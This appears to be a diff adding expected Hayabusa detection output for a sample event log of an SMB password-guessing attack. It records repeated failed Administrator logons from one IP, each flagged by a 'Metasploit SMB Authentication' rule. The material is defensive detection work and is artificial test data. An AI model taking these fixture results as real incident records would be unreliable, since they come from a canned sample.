+2016-09-20 01:51:49.853 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dhJvIM5PzA9U6GTD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.892 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KYrfD15TPp8OuST4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8d4CbZSTHhl7fRfa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:49.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IItrtl1h3PsKviaQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.027 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WVeoptuwLNKlm0V2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Rf6Ri9Lm81mScRt4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.222 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NPVkTRUILL5czcbF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.282 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QZJq3kjykwzh0hVh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lHL4KuirjQ96Dgfw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DSPjDklMHdW6LqK5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EL0oMweyFgI0MEdM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NJS2dZhWmCGF1Qos  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.514 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bNR5dXXnx0LeyNmW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ApUMxqDiqDNo6hrF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.605 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o3d1caGukhhBHp6s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.653 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oxDVCaWpkSECRoml  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: coqijUGaaVJXY4GV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7ATPa6qMbfQ9QDrW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mnQEE00r01jhCNzr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ir9sY7kG6vbOad4z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.946 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: REuk1RZ5eRs3pSbT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:50.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 91gfIcAUvKrSAENh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MtrVV1ux0v5w5XWZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rFpyAqPQP77Ls6ir  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nvwp4DimL7SgBmb0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: u1lnJZDjghQNQxfG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.202 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pBN1g8NBIj6WMrhz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cJMUobtFTwOQTgqd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QGZeGqe9rC172BVa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.333 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zNP99dMvvDQl8WVw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qcwp0odjR0LfM11y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6VjaFCzZr8iUUovn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.480 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C3YniJHC0Cswfti0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 63lZpExTzSzNR96C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fKI61MTXJ5x9WF56  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.602 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NhWYNEPWgh03cQSJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.654 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pvZg2LTYtsUhvBhr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BENGUFtNxdPjaS03  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.728 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fY1s0OG9JR38H6rm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.778 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LblLG1Il6ngkuAOo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PAZ83Onp00vURKSz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BxvywmA4UMI04zm2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.942 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1vH6DSer71gxEDRc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:51.997 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uDNQibannB453BKc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 02qkYtCIrOj38agd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.101 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:52.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: atDwGfxC4RLYYDAF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
